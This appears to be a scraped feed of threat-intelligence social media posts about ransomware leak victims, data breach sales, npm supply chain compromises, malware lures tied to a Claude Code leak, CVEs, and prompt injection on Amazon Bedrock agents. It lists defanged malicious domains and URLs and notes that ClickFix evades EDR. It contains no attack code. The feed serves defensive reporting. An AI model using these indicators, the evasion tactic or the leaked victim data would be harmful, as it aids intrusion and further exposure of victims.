🚨 DragonForce just dropped 3 new victims on their leak portal (Apr 4):

🇹🇭 Siam Okamura International — office furniture — 368.7 GB
🇻🇳 Vietnam Fortress Tools JSC — industrial tools — 402.33 GB
🇪🇬 AUG Pharma — pharma — 890.34 GB

~1.66 TB total. Mama mia. 🍄

#Ransomware #DragonForce #CTI #ThreatIntel

Create two threat intelligence accounts, one on bsky and the other on X, so that I can provide new threat reports as a feed, check it out at:

BSky - bsky.app/profile/inte...
X - x.com/ORIntelligence

#ThreatIntel #InfoSec

Wahoo! 🍄 Nova group allegedly hit EMCO Electric International, a manufacturer of electrical installation products. Clients in sensitive sectors like food, pharma, and water treatment could face supply chain risks. 🚨 #Manufacturing #DataBreach #CTI #ThreatIntel

CVE-2026-33107

Third critical vulnerability in a major cloud data platform this quarter.

www.yazoul.net/advisory/cve/cve-2026-33...

#InfoSec #ThreatIntel

March 2026 Supply Chain Attacks

~Zscaler~
Axios (NPM) and LiteLLM (PyPI) packages were compromised to distribute RATs and harvest cloud secrets.
-
IOCs: sfrclak. com, 142. 11. 206. 73
-
#Malware #SupplyChain #ThreatIntel

Claude Code CLI Source Leak

~Varonis~
Anthropic accidentally leaked the Claude Code CLI source via an npm package, exposing internal architecture and guardrails.
-
IOCs: @anthropic-ai/claude-code@2. 1. 88
-
#AI #DataLeak #ThreatIntel

Claude Code Leak Weaponized

~Trendmicro~
Actors are exploiting the Claude Code source leak to distribute Vidar stealer via fake GitHub repositories.
-
IOCs: rti. cargomanbd. com, pastebin. com/raw/mcwWi1Ue, snippet. host/efguhk/raw
-
#Malware #ThreatIntel #Vidar

Amazon Bedrock Multi-Agent Prompt Injection

~Paloalto~
Researchers demonstrated prompt injection attacks on Amazon Bedrock multi-agent apps to extract instructions and misuse tools, mitigated by built-in guardrails.
-
IOCs: (None identified)
-
#AI #PromptInjection #ThreatIntel

Elastic Security Integrations Q1 2026

~Elastic~
Elastic announced 9 new security integrations for Q1 2026, including macOS, QRadar, and AWS Security Hub.
-
IOCs: (None identified)
-
#ElasticSecurity #SIEM #ThreatIntel

Axios NPM Supply Chain Attack

~Talos~
Malicious Axios npm packages (v1.14.1, v0.30.4) were deployed to deliver a RAT and steal credentials.
-
IOCs: 142[. ]11[. ]206[. ]73, Sfrclak[. ]com
-
#SupplyChain #ThreatIntel #npm

Supply Chain Attack Trends

~Talos~
Recent major supply chain attacks target popular libraries like Axios and GitHub repos, highlighting the need for robust CI/CD security.
-
IOCs: Txt. Trojan. TeamPCP-10059839-0, React2Shell
-
#SupplyChain #TeamPCP #ThreatIntel

Axios npm Compromise via Social Engineering

~Socket~
Axios maintainer confirms a targeted social engineering attack hijacked active sessions to publish a remote access trojan to npm.
-
IOCs: (None identified)
-
#SupplyChain #ThreatIntel #npm

🚨 #DataBreach | lit.it (Italy) — crypto video platform — reportedly hit in Feb 2026. ~300K user records freely
dumped: full names, emails, usernames.

Actor "xorcat" dropped this at no charge. No ransom, no price tag.

Stay sharp. 🍄

#CTI #ThreatIntel #InfoSec

Waaaah! 🍄 #DataBreach | actor "gtaviispeak" selling ~243k records from clickitsolutions.it (Italy).

Full CRM dump: fiscal codes, encrypted passwords, payment data, billing/shipping addresses & internal
ticket notes.

On sale now.

🚨 #CTI #ThreatIntel

MISP now supports rich geolocation visualisation for objects containing geographic data. When enabled, geolocation objects display an interactive map icon that renders coordinates on a tile-based map.

We are happy to announce the release of MISP v2.5.36, which includes new geolocation and map visualisation capabilities, the continued development of the Overmind UI, a new interactive CLI shell UI, important security fixes, and installer improvements […]

[Original post on infosec.exchange]

Compliance Won't Save Healthcare

~Akamai~
HHS HIPAA updates stress that healthcare must adopt microsegmentation to contain ransomware blast radiuses, as compliance alone is insufficient.
-
IOCs: (None identified)
-
#Healthcare #Ransomware #ThreatIntel

CYBER THREAT INTELLIGENCE BRIEFING Nation-State Threat Landscape Assessment Reporting Period: February 17 – April 3, 2026 Runtime: April 3, 2026 Classification: UNCLASSIFIED // OSINT

Latest Threat Intelligence Briefing for cyber operations with Russia, China, North Korea, and Iran #cybersecurity #iran #russia #china #northkorea #threatintel

CYBER THREAT INTELLIGENCE BRIEFING open.substack.com/pub/cyberwar...

Claude Code Leak Weaponized

~Trendmicro~
Threat actors are exploiting an accidental Claude Code source leak to distribute Vidar stealer and GhostSocks malware via fake GitHub repositories.
-
IOCs: TradeAI. exe, Vidar Stealer, GhostSocks
-
#Malware #Vidar #threatintel

CoBRA: MBA Obfuscation Simplifier

~Trailofbits~
Trail of Bits released CoBRA, an open-source tool that simplifies 99.8% of Mixed Boolean-Arithmetic (MBA) obfuscation used in malware.
-
IOCs: (None identified)
-
#Malware #ReverseEngineering #ThreatIntel

Cybercrime is evolving beyond digital.
Vacant homes + mail systems are being used to intercept sensitive data and enable fraud.
No malware. Just system abuse.
Follow TechNadu & join the discussion 👇
#CyberSecurity #Infosec #Fraud #ThreatIntel

Government fraud gets framed like a stack of scams. Cleaner lie. The real problem looks more like identity infrastructure with a payout engine attached. Same weak proofing, same rails, same movie, different claim form.

Read it here: blog.alphahunt.io/the-real-gov...

#AlphaHunt #ThreatIntel

Breach & Build — Cybersecurity, CVE & Tech News Breaking cybersecurity news, CVE vulnerability disclosures, CVSS scores, EPSS data, and technology analysis.

🚨 CVE Weekly Roundup | 2026-03-26 – 2026-04-02

🔍 1,045 CVEs tracked (+184 vs last week)
⚠️ 3 actively exploited (0.3%)
🔴 86 critical (CVSS 9.0+)

Our weekly threat breakdown — what actually matters this week
#cybersecurity #CVE #threatintel #infosec

breachandbuild.com/cve-exploita...

Heap overflow in `get_options()` ### Summary There is a heap-based buffer overflow in the CUPS scheduler when building filter option strings from job attributes. ### Details Note file references are accurate for the lates...

Holiday weekend oopsie in CUPS:

github.com/OpenPrinting/cups/securi...

Just as well no-one prints any more...

#cups, #threatintel

New U.S. National Cyber Strategy

~Trendmicro~
The White House released a new National Cyber Strategy focusing on 6 pillars including AI, critical infrastructure, and cyber talent.
-
IOCs: (None identified)
-
#CyberStrategy #Policy #threatintel

AI-Driven BEC & React2Shell Exploits

~Talos~
AI lowers the barrier for BEC attacks, while a massive campaign exploits Next.js React2Shell to harvest cloud credentials.
-
IOCs: CVE-2025-55182
-
#BEC #React2Shell #ThreatIntel

Node.js Pauses Bug Bounty Program

~Socket~
Node.js has paused its bug bounty program following the suspension of the Internet Bug Bounty (IBB) funding initiative.
-
IOCs: (None identified)
-
#BugBounty #NodeJS #ThreatIntel

CISA Adds TrueConf Flaw to KEV

~Cisa~
CISA added CVE-2026-3502, a TrueConf Client integrity check flaw, to its KEV catalog due to active exploitation.
-
IOCs: CVE-2026-3502
-
#CISA #CVE2026_3502 #threatintel

Here are the #Top10 trending hashtags on #Bluesky the past hour:

#ransomware #threatintel #crackcodes #epsteinweb #tg #art #nowplaying #trump #iran #trumpstariffscostus

Powered by https://getskyscraper.com

Because the user manually initiates the execution through the native Windows Run dialog, this tactic frequently bypasses standard EDR behavioral alerts.

#InfoSec #CyberSecurity #RedTeam #Malware #Infostealer #Technology #Microsoft #ClickFix #Armada #ArmadaOps #Hacking #ThreatIntel